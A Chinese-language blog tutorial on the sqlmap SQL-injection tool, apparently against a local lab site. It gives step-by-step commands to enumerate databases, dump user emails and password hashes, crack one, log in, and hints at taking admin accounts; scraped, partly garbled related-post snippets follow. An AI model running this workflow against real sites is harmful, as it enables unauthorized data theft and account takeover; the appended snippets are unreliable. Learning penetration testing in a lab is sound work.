滲透測試工具sqlmap基礎教程
轉載請註明出處:http://blog.csdn.net/zgyulongfei/article/details/41017493
作者:羽龍飛
本文僅獻給想學習滲透測試的sqlmap小白,大牛請繞過。
>
>
對於網路安全人員來說,掌握滲透工具的使用方法是一項必備的技能。然而,一個沒有師傅帶領的小白在剛開始學習時,並不知道該如何入手進行滲透學習,所以本文旨在幫助這些小白入門。
sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。它由python語言開發而成,因此執行需要安裝python環境。
既然本文是基礎教程,以下只寫工具的基本使用方法。
測試環境:本地搭建的具有sql注入點的網站 http://192.168.1.150
注意:sqlmap只是用來檢測和利用sql注入點的,並不能掃描出網站有哪些漏洞,使用前請先使用掃描工具掃出sql注入點。
教程開始:
一、檢測注入點是否可用
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
引數:
-u:指定注入點url
結果:
注入結果展示:
(1)注入引數id為GET注入,注入型別有四種分別為:boolean-based blind、error-based、stacked queries、inline query。
(2)web伺服器系統為windows 2003 or XP
(3)web應用程式技術為:ASP.NET, Microsoft IIS 6.0
(4)資料庫型別為:SQLSERVER 2000
其中圖一有若干詢問語句,需要使用者輸入[Y/N],如果你懶得輸入或者不懂怎麼輸入可以讓程式自動輸入,只需新增一個引數即可,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴庫
一條命令即可曝出該sqlserver中所有資料庫名稱,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
引數:
--dbs:dbs前面有兩條槓,請看清楚。
結果:
結果顯示該sqlserver中共包含7個可用的資料庫。
三、web當前使用的資料庫
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
四、web資料庫使用賬戶
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
五、列出sqlserver所有使用者
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
六、資料庫賬戶與密碼
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
七、列出資料庫中的表
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
引數:
-D:指定資料庫名稱
--tables:列出表
結果:
結果體現共列出了34張表。
八、列出表中欄位
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
引數:
-D:指定資料庫名稱
-T:指定要列出欄位的表
--columns:指定列出欄位
結果:
結果顯示該userb表中包含了23條欄位。
九、暴欄位內容
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
引數:
-C :指定要暴的欄位
--dump:將結果匯出
結果:
如果欄位內容太多,需要花費很多時間。可以指定匯出特定範圍的欄位內容,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
引數:
--start:指定開始的行
--stop:指定結束的行
此條命令的含義為:匯出資料庫tourdata中的表userb中的欄位(email,Username,userpassword)中的第1到第10行的資料內容。
結果如下:
十、驗證結果
通過上圖結果看到其中的一個使用者資訊為:
email:[email protected]
username: 1.asp
password: 49ba59abbe56e057
通過md5解密,得到該hash的原文密碼為:123456
拿到賬號密碼我們來測試是否可以登入,登入結果如下:
驗證成功!
當然我們只是拿到普通會員賬號進行登入,你也可以拿到管理員賬號進行登入,後面的事情自己發揮吧,嘿嘿!
相關推薦
滲透測試工具sqlmap基礎教程
轉載請註明出處:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛 本文僅獻給想學習滲透測試的sqlmap小白,大牛請
滲透測試工具之sqlmap
otto oot use 如果 idt pla tle 訪問權限 都是 1. sqlmap是什麽 在這個數據有價的時代數據庫安全已經成為了重中之重,於是就整理了一下最常用的一款(反正我上大學的時候它還是蠻流行的...)數據庫安全方面的滲透測試工具sqlmap的使用筆記。
效能測試工具Locust基礎安裝教程與學習總結
一、locust簡介 1、locust作為一款效能測試工具,沒有單獨的ui介面,可以說是python下的一些庫的整合 locust完全基於python作為程式語言,採用pure python描述測試指令碼,其中的http請求也是完全基於Requests庫,除了HTTP/HTT
滲透測試工具Nmap從初級到高級
所有 iat ota not lin 大寫 包含 分享 特定 轉自:http://www.91ri.org/3550.html 滲透測試工具Nmap從初級到高級 Nmap是一款網絡掃描和主機檢測的非常有用的工具。 Nmap是不局限於僅僅收集信息和枚舉,同時可以用來作為一個漏
滲透測試工具實戰技巧合集
read mimikatz insert wce ebr unicorn free import 軟連接 轉載自:http://www.freebuf.com/sectool/105524.html 最好的 NMAP 掃描策略 # 適用所有大小網絡最好的 nmap 掃描
Firefox成為滲透測試工具的18個外掛
轉載~ Firefox是一個出自Mozilla組織的流行的web瀏覽器。Firefox的流行並不僅僅是因為它是一個好的瀏覽器,而是因為它能夠支援外掛進而加強它自身的功能。Mozilla有一個外掛站點,在那裡面有成千上萬的,非常有用的,不同種類的外掛。一些外掛對於滲透測試人員
測試工具之Fidder教程
[參考資料]http://blog.csdn.net/guoguo527/article/details/52127412 1. 簡介 Fiddler(中文名稱:小提琴)是一個HTTP的除錯代理,以代理伺服器的方式,監聽系統的Http網路資料流動, Fiddler可以也可以讓
第一章滲透測試技術技術基礎
滲透測試時一種通過模擬攻擊者的技術與方法,挫敗目標系統的安全控制措施並取得訪問控制權限的安全測試方式。 滲透測試階段 1.前期互動階段 確定滲透測試的目標與範圍 2.情報蒐集階段 採取各種可能的方法蒐集將要攻擊客戶組織的所有資訊。 3.威脅建模階段
Python 滲透測試工具合集
Python 真的是博大精深。 如果你熱愛漏洞研究、逆向工程或者滲透測試,我強烈推薦你使用 Python 作為程式語言。它包含大量實用的庫和工具,本文會列舉其中部分精華。 網路 Scapy, Scapy3k: 傳送,嗅探,分析和偽造網路資料包。可用作互動式包處理程式或單獨作為一個庫。 pypcap,
壓力測試工具JMeter入門教程
1.Jmeter 概要描敘 jmeter 是一款專門用於功能測試和壓力測試的輕量級測試開發平臺。多數情況下是用作壓力測試,該測試工具在阿里巴巴有著廣泛的使用,估計是不要錢吧,哈哈,功能上來說,整個平臺實現了許多和網際網路相關的網路測試元件,同時還保留著很強的擴充套件性
BackTrack平臺中主流滲透測試工具
資訊收集第一類、DNS掃描工具 收集資訊包括:域名註冊資訊 域名解析伺服器(DNS Server)、有效的子域名稱 1、Whois 使用方法:#whois 頂級域名 2、Dnsenum 所在路徑:/pentest/enumeration/
[滲透測試] 工具簡介
1.漏洞掃描類: JSky:中文名字為竭思,是深圳市宇造諾賽科技有限公司的產品是一款簡明易用的Web漏洞掃描軟體。 WebCruiser:一個小巧但功能不凡的Web應用漏洞掃描器。對JSP的掃描結果較好,但需要.NET Framework 3.5。 WATScan:中文名叫
滲透測試工具小抄
介紹 滲透測試工具作弊表,典型穿透測試工作的快速參考高階概述。設計為快速參考作弊表,提供執行滲透測試時將執行的典型命令的高階概述。對於更深入的資訊,我會從右側的選單中推薦該工具的man檔案或更具體的筆測試作弊表。 該作弊表的重點是基礎架構/網路滲透測試,除
kali滲透測試工具:Crunch
Crunch是一種建立密碼字典工具,該字典通常用於暴力破解。使用Crunch工具生成的密碼可以傳送到終端、檔案或另一個程式。下面將介紹使用Crunch工具建立密碼字典。 crunch命令常用的選項如下所示。 •-o:用於指定輸出字典檔案的位置。 •-b:指定寫入檔案最大的位
kali滲透測試工具:Nmap
Nmap是一個免費開放的網路掃描和嗅探工具包,也叫網路對映器(Network Mapper)。該工具其基本功能有三個,一是探測一組主機是否線上;其次是掃描主機埠,嗅探所提供的網路服務;三是可以推斷主機所用的作業系統。通常,使用者利用Nmap來進行網路系統安全的評估,而黑客則
滲透測試工具Nmap的攻防戰
Nmap的下載地址:http://nmap.org/download.html Nmap的基本功能介紹 Nmap是一款網路掃描和主機檢測的非常有用的工具。 Nmap是不侷限於僅僅收集資訊和列舉,同時可以用來作為一個漏洞探測器或安全掃描器。它可以適用於winodws,lin
性能測試工具 wrk 使用教程
自定義 max 會有 延遲 針對 成功 階段 一行 red 文章首發自個人微信公眾號:小哈學Java 個人網站地址:https://www.exception.site/wrk 被面試官經常問到之前開發的系統接口 QPS 能達到多少,經常給不出一個數值,支支吾吾,導致
Netperf網路效能測試工具詳解教程
本文下載連結: 【學習筆記】Netperf網路效能測試工具.pdf 一、Netperf工具簡介 1、什麼是Netperf ? (1)Netperf是由惠普公司開發的一種網路效能測量工具,主要針對基於TCP或UDP的傳輸。 (2)Netperf根據應用的不同,可以進行不同模式的網路效能測試,即批量資料傳輸(bu
web滲透測試之sqlmap拿到資料庫資訊
通過掃描我們發現目標網站存在sql注入漏洞,我們訪問該裡面後發現該網站裡面有個表格提交引數.確實存在沒有過濾 使用sqlmap掃描發現漏洞的確存在,這裡是布林盲注 檢視當前資料庫名 查看錶名得到以下資訊 &nb
滲透測試教程(基礎篇)-1
滲透測試教程(基礎篇) ■ 文件編號 V1.0 ■ 密級 內部使用 ■ 版本編號 ■ 日期 2016-11-10 ■ 版本變更記錄 時間 版本 說明 修改人 2016-11-10 V1.0 新建 四盤山